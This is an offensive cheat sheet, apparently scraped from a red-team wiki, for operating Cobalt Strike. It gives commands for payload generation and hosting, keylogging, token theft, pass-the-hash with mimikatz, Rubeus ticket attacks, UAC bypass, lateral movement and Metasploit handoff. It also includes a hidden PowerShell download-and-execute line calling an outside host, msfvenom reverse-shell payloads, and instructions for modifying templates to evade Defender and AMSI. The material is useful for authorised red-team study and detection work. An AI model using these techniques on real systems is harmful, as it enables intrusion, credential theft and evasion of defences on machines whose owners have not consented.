Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
Peer2Peer Listeners
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
Cobalt Strike -> Listeners -> Add/Edit then you need to select the TCP or SMB beacons
The TCP beacon will set a listener in the port selected. To connect to a TCP beacon use the command connect <ip> <port> from another beacon
The smb beacon will listen in a pipename with the selected name. To connect to a SMB beacon you need to use the command link [target] [pipe].
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
HTMLApplication for HTA files
MS Office Macro for an office document with a macro
Windows Executable for a .exe, .dll orr service .exe
Windows Executable (S) for a stageless .exe, .dll or service .exe (better stageless than staged, less IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S) This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
Host Payloads
If you already has the file you want to host in a web sever just go to Attacks -> Web Drive-by -> Host File and select the file to host and web server config.
Beacon Options
# Execute local .NET binaryexecute-assembly</path/to/executable.exe># Screenshotsprintscreen# Take a single screenshot via PrintScr methodscreenshot# Take a single screenshotscreenwatch# Take periodic screenshots of desktop## Go to View -> Screenshots to see them# keyloggerkeylogger [pid] [x86|x64]## View > Keystrokes to see the keys pressed# portscanportscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
portscan [targets] [ports] [arp|icmp|none] [max connections]# Powershell# Import Powershell modulepowershell-importC:\path\to\PowerView.ps1powershell<justwritepowershellcmdhere># User impersonation## Token generation with credsmake_token [DOMAIN\user] [password] #Create token to impersonate a user in the networkls \\computer_name\c$ # Try to use generated token to access C$ in a computerrev2self# Stop using token generated with make_token## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# UAC Bypasselevatesvc-exe<listener>elevateuac-token-duplication<listener>runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid## Like make_token but stealing the token from a processsteal_token [pid] # Also, this is useful for network actions, not local actions## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computerrev2self# Stop using token from steal_token## Launch process with nwe credentialsspawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
## Inject into processinject [pid] [x64|x86] [listener]## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
## Pass the hash## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
pth [pid] [arch] [DOMAIN\user] [NTLM hash]pth [DOMAIN\user] [NTLM hash]## Pass the hash through mimikatzmimikatzsekurlsa::pth/user:<username>/domain:<DOMAIN>/ntlm:<NTLMHASH>/run:"powershell -w hidden"## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
steal_token<pid>#Steal token from process created by mimikatz## Pass the ticket## Request a ticketexecute-assemblyC:\path\Rubeus.exeasktgt/user:<username>/domain:<domain>/aes256:<aes_keys>/nowrap/opsec## Create a new logon session to use with the new ticket (to not overwrite the compromised one)make_token<domain>\<username>DummyPass## Write the ticket in the attacker machine from a poweshell session & load it[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_useC:\Users\Administrator\Desktop\jkingTGT.kirbi## Pass the ticket from SYSTEM## Generate a new process with the ticketexecute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that processsteal_token<pid>## Extract ticket + Pass the ticket### List ticketsexecute-assemblyC:\path\Rubeus.exetriage### Dump insteresting ticket by luidexecute-assemblyC:\path\Rubeus.exedump/service:krbtgt/luid:<luid>/nowrap### Create new logon session, note luid and processidexecute-assemblyC:\path\Rubeus.execreatenetonly/program:C:\Windows\System32\cmd.exe### Insert ticket in generate logon sessionexecute-assemblyC:\path\Rubeus.exeptt/luid:0x92a8c/ticket:[...base64-ticket...]### Finally, steal the token from that new processsteal_token<pid># Lateral Movement## If a token was created it will be usedjump [method] [target] [listener]## Methods:## psexec x86 Use a service to run a Service EXE artifact## psexec64 x64 Use a service to run a Service EXE artifact## psexec_psh x86 Use a service to run a PowerShell one-liner## winrm x86 Run a PowerShell script via WinRM## winrm64 x64 Run a PowerShell script via WinRMremote-exec [method] [target] [command]## Methods:## psexec Remote execute via Service Control Manager## winrm Remote execute via WinRM (PowerShell)## wmi Remote execute via WMI## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute itbeacon> uploadC:\Payloads\beacon-smb.exebeacon> remote-execwmisrv-1C:\Windows\beacon-smb.exe# Pass session to Metasploit - Through listener## On metaploit hostmsf6>useexploit/multi/handlermsf6exploit(multi/handler) >setpayloadwindows/meterpreter/reverse_httpmsf6exploit(multi/handler) >setLHOSTeth0msf6exploit(multi/handler) >setLPORT8080msf6exploit(multi/handler) >exploit-j## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
beacon> spawnmetasploit## You can only spawn x86 Meterpreter sessions with the foreign listener.# Pass session to Metasploit - Through shellcode injection## On metasploit hostmsfvenom-pwindows/x64/meterpreter_reverse_httpLHOST=<IP>LPORT=<PORT>-fraw-o/tmp/msf.bin## Run msfvenom and prepare the multi/handler listener## Copy bin file to cobalt strike hostpsshinject<pid>x64C:\Payloads\msf.bin#Inject metasploit shellcode in a x64 process# Pass metasploit session to cobalt strike## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode# Pivoting## Open a socks proxy in the teamserverbeacon> socks1080# SSH connectionbeacon> ssh10.10.17.12:22usernamepassword
Avoiding AVs
Artifact Kit
Usually in /opt/cobaltstrike/artifact-kit you can find the code and pre-compiled templates (in /src-common) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using ThreatCheck with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run ./build.sh from the same directory and copy the dist-pipe/ folder into the Windows client in C:\Tools\cobaltstrike\ArtifactKit.
Don't forget to load the aggressive script dist-pipe\artifact.cna to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using ThreatCheck with the templates you can find what is defender (AMSI in this case) not liking and modify it:
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script ResourceKit\resources.cna to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
